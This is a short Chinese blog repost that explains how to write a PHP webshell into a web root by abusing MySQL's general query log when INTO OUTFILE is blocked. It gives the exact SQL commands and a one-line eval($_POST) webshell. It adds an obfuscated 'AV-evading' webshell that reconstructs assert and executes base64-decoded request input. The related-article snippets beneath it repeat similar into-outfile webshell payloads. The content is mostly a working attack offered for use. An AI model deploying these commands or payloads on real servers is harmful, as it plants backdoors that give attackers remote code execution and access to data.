SQL语句利用日志写shell

最新推荐文章于 2024-04-10 11:00:39 发布
转载 最新推荐文章于 2024-04-10 11:00:39 发布 · 156 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/hookjoy/p/8589509.html
文章标签:

#shell #php #数据库

本文介绍了一种通过SQL语句写入PHP Shell的方法,并详细展示了如何利用MySQL的配置及特性来实现这一过程。该方法涉及开启General Log模式、指定日志文件路径以及构造特定的SQL查询来生成免杀的Web Shell。

outfile被禁止,或者写入文件被拦截;

在数据库中操作如下:(必须是root权限)

 

show variables like '%general%';  #查看配置
 
set global general_log = on;  #开启general log模式
 
set global general_log_file = '/var/www/html/1.php';   #设置日志目录为shell地址
 
select '<?php eval($_POST[cmd]);?>'  #写入shell

SQL查询免杀shell的语句

SELECT "<?php $p = array('f'=>'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_= 'a'.$_.'rt';$_(base64_decode($_REQUEST['username']));?>"

SQL语句利用日志写shell

转载于:https://www.cnblogs.com/hookjoy/p/8589509.html

sqlshell原理_sql注入shell的条件
2301_77033340的博客
04-12 790
本篇文章属于自己验证,如有错误之处,请大佬指正。如需转载请注明本次验证涉及的工具有:1 Sqlmap 版本为1.7.22 Phpstudy 版本为8.1.1.3(Apache+Php(5.4)+Mysql(5.7))3 Burpsuite 2021专业版5 Navicat6 中国蚁剑7 靶场环境为Pikachu工具都是常见工具,如需要请网上自行下载1. 知晓网站的绝对路径原因是因为在指定--os-shell参数时,期间会让你输入要入木马的web路径,不然蚁剑如何连接。
渗透测试之利用sqlshell(附完整流程)【全】
最新发布
ai0070411的博客
03-09 1260
SQL注入的本质是。
【知识整理】利用SQL语句shell的方法
命运的旋律的博客
03-22 3783
利用SQL语句shell的方法 要利用sqlshell就需要在配置中满足以下条件: 在mysql的配置文件my.ini中,secure_file_priv为空(被注释掉或不填)或者secure_file_priv配置是目录地址。 未开启全局GPC 关于mysql的secure_file_priv属性得多说几句 当secure_file_priv为空时,mysql对导入导出文件是没有限制的 ...
shell入文件_SQL语句利用日志shell
weixin_39774219的博客
12-18 369
outfile被禁止,或者入文件被拦截;在数据库中操作如下:(必须是root权限)show variables like '%general%'; #查看配置set global general_log = on; #开启general log模式set global general_log_file = '/var/www/html/1.php'; #设置日志目录为shell...
Shell脚本中执行sql语句操作mysql的5种方法
09-15
### Shell脚本中执行SQL语句操作MySQL的五种方法详解 #### 一、引言 在日常的系统管理和维护工作中,尤其是对于自动化运维任务,如数据库备份与恢复等场景,常常需要通过Shell脚本来执行SQL语句来操作MySQL数据库。...
Django shell调试models输出的SQL语句方法
09-18
总的来说,通过正确配置日志和使用shell或`shell_plus`,开发者可以在Django中方便地查看和调试models执行的SQL语句,这对于理解和优化应用程序的数据库性能至关重要。确保了解和掌握这些技巧,可以显著提高开发效率...
【HBase之轨迹】(3)Apache Phoenix 5.1.2 详细使用,像 MySQL 一样使用 SQL 语句操作 HBase(Shell 操作和 SpringBoot+MyBatis 整合)
Ice__Clean的博客
03-08 3175
本篇将记录 Phoenix 的安装配置过程,Shell 使用和使用 SpringBoot+MyBatis 整合 Phoenix。 配置过程中的一些常见错误已经在文中指出,有如 Phoenix 无法启动、缺少依赖、Command line too long、如何映射实体类等。 避免走笔者已经走过的弯路,如果还发现新的问题欢迎留言。
mysql 开启日志 shell_【安全科普】SQL语句利用日志shell及相关绕过
weixin_29001327的博客
01-27 644
原标题:【安全科普】SQL语句利用日志shell及相关绕过● 0x01 基本原理●在能够SQL语句的地方,outfile、dumpfile、drop database等都被禁止,一般进行SQL注入来getshell或删库的方式行不通了。但是如果MySQL是root用户启动的,那么可以进行如下利用:1showvariableslike'%general%'; #查看配置23setglobalge...
sqlshell原理_sql注入shell的条件,附大厂真题面经
2401_84183070的博客
04-10 1098
本篇文章属于自己验证,如有错误之处,请大佬指正。如需转载请注明本次验证涉及的工具有:1 Sqlmap 版本为1.7.22 Phpstudy 版本为8.1.1.3(Apache+Php(5.4)+Mysql(5.7))3 Burpsuite 2021专业版5 Navicat6 中国蚁剑7 靶场环境为Pikachu工具都是常见工具,如需要请网上自行下载知晓网站的绝对路径原因是因为在指定–os-shell参数时,期间会让你输入要入木马的web路径,不然蚁剑如何连接。
sql注入shell
weixin_51646864的博客
04-23 7001
靶场练习一下sql注入shell方式
SQL注入webshell
huangyongkang666的博客
03-25 3565
SQL注入webshell 1.MySQLshell 入WebShell的几种方式 1、利用Union select 入 需要满足的条件 对web目录有权限 GPC关闭(GPC:是否对单引号转义) 有绝对路径(读文件可以不用,文件需要) 没有配置secure-file-priv ?id=1 union select '<?php assert($_POST["cmd"]);?>’ into outfile 'D:/WWW/evil.php' ?id=1 union select
SQL语句利用日志shell(转载)
来到了学渣的博客
01-01 1340
outfile被禁止,或者入文件被拦截 在数据库中操作如下:(必须是root权限) 1.show variables like ‘%general%’; #查看配置 2.set global general_log = on; #开启general log模式 3.set global general_log_file = ‘/var/www/html/1.php’; #设置日志目录为shell...
【网络安全---sql注入(2)】如何通过SQL注入getshell?如何通过SQL注入读取文件或者数据库数据?一篇文章告诉你过程和原理。
m0_67844671的博客
10-01 2559
sql注入】如何通过SQL注入getshell?如何通过SQL注入读取文件或者数据库数据?一篇文章告诉你过程和原理。本篇博客主要是通过piakchu靶场来讲解如何通过SQL注入漏洞来入文件,读取文件。通过SQL输入来注入木马来getshell等,讲解了比较详细的过程;
SQL注入GetShell的方法(1)
forinput的博客
05-06 5297
SQL注入getshell的五中方式
记一次shell 将进程数据入mysql的监控
weixin_44996457的博客
10-31 294
一、背景 1.jar包运行方式(多个类似的jar包需要运行) nohup java -cp /opt/jbdl/lib/kafka_to_oracle-oms.jar cn.com.sgcc.jibei.aclineend.KafkaToAclineend >/sga/jbdl/logs/omslogs/aclineend-flink.log & 2.ps -ef|grep kaf...
Shell自动化执行SQL脚本的技巧
相反,通过Shell脚本,用户仅需运行一个简单的命令,即可实现对SQL脚本文件中所有SQL语句的自动执行。这在批量处理数据库任务时非常方便,尤其是对于那些需要定期执行的数据库维护作业,如数据清洗、备份等。 #### ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值